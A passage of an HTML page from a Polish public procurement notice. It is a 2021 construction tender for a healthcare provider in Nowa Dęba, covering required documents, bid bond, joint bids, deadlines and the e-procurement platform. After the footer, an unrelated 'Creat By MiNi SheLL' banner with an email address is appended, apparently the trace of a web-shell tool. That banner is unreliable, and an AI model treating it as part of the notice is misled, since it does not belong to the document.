zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - Załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Wykonawca przedkłada wraz z ofertą następujące formularze:<br/> a) wypełniony i podpisany Formularz ofertowy - zgodnie z Załącznikiem nr 1 do SWZ, zawierający w szczególności: wskazanie zakresu, części oferowanego przedmiotu zamówienia, cenę ofertową brutto, zobowiązanie dotyczące warunków płatności, oświadczenie o okresie związania ofertą oraz o akceptacji wzoru umowy w sprawie zamówienia publicznego bez zastrzeżeń, a także informację którą część zamówienia Wykonawca zamierza powierzyć podwykonawcy,<br/> b) Oświadczenie - dot. mechanizmu odwróconej płatności, zgodnie z Załącznikiem nr 5 do SWZ.<br/><br/> 2. Wykonawca, którego oferta zostanie wyłoniona, jako najkorzystniejsza, zobowiązany jest przed podpisaniem umowy przedstawić następujące dokumenty:<br/> ▪ kosztorysy ofertowe z podziałem na <br/> a) modernizację i budowa rezerwowego źródła wody,<br/> b) termomodernizacja budynku,<br/> ▪ wykaz osób skierowanych do realizacji zadania zatrudnionych na podstawie umowy o pracę,<br/>3. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z Oświadczeniem, o którym mowa w Rozdziale XI pkt. 1 SWZ, także Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu (jeżeli Zamawiający je postawił), w zakresie, w jakim Wykonawca powołuje się na jego zasoby, zgodnie z katalogiem dokumentów określonych w Rozdziale XI SWZ. Wzór oświadczenia stanowi załącznik nr 8 do SWZ.<br/>4. Odpowiednie pełnomocnictwa (jeżeli dotyczy).<br/> 5. Dowód wniesienia wadium.<br/>6. W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>10 000,00 zł (słownie: dziesięć tysięcy złotych) <br/> 2. Wadium wnosi się przed upływem terminu składania ofert. <br/> 3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/> a) pieniądzu – przelewem na konto zamawiającego w 07 1240 2744 1111 0000 3990 9648<br/> b) gwarancjach bankowych;<br/> c) gwarancjach ubezpieczeniowych;<br/> d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/> 4. Wadium wnoszone w formie pieniężnej musi wpłynąć na rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert. <br/> 5. Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale i musi obejmować cały okres związania ofertą. W przypadku wniesienia wadium w formie gwarancji lub poręczenia koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium, określone w art. 98 ust. 6 p.z.p.<br/> 6. Wadium w formie poręczeń lub gwarancji należy złożyć wraz z ofertą w oryginale w postaci elektronicznej.<br/> 7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. <br/>Pełnomocnictwo winno być załączone do oferty.<br/> 2. Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego - kopii umowy regulującej współpracę tych Wykonawców.<br/> 3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale XI, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia (oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/> 4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy.<br/> 5. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały określone w SWZ oraz Załączniku nr 4 do SWZ Wzór umowy, w paragrafie 21. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zoznowadeba.ezamawiajacy.pl.w zakładce „ OFERTY"</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wraz z<br/>przekazaniem informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów<br/>ustawy z dnia 16 kwietnia 1993 roku o zwalczaniu nieuczciwej konkurencji, Wykonawca<br/>zobowiązany jest zastrzec w ofercie, że nie mogą być one udostępniane oraz wykazać, że<br/>zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa1) Składając ofertę w<br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym na Platformie dokumenty zawierające informacje stanowiące tajemnicę<br/>przedsiębiorstwa powinny zostać załączone w osobnym pliku wraz z jednoczesnym<br/>zaznaczeniem polecenia „Tajne". Wczytanie załącznika następuje poprzez polecenie<br/>„Dodaj". Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Nazwa Jednostki: https://zoznowadeba.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl. Wykonawca po wybraniu opcji „przystąp do<br/>postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie<br/>powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca<br/>zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło,<br/>następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie<br/>„zarejestruj się”. Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z<br/>tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w<br/>procesie złożenia Oferty w postaci elektronicznej. Zamawiający informuje, iż w<br/>przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy,<br/>Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma<br/>zakupowa SPZZOZ w Nowej Dębie tel. +48 22 257 22 23 (infolinia dostępna w dni robocze, w<br/>godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl .Korzystanie z Platformy dla<br/>Wykonawcy jest bezpłatne.<br/>Pozostałe kody CPV:<br/>45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne<br/>45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych<br/>45223210-1 Roboty konstrukcyjne z wykorzystaniem stali<br/>45410000-4 Tynkowanie<br/>45421000-4 Roboty w zakresie stolarki budowlanej<br/>45430000-0 Pokrywanie podłóg i ścian<br/>45440000-3 Roboty malarskie i szklarskie<br/>45450000-6 Roboty budowlane wykończeniowe, pozostałe<br/>45233222-1 Roboty budowlane w zakresie układania chodników i asfaltowania<br/>45317000-2 Inne instalacje elektryczne<br/>45311200-2 Roboty w zakresie instalacji elektrycznych<br/>45317300-5 Elektryczne elektrycznych urządzeń rozdzielczych<br/>45311000-0 Roboty w zakresie okablowania oraz instalacji elektrycznych</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-17 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com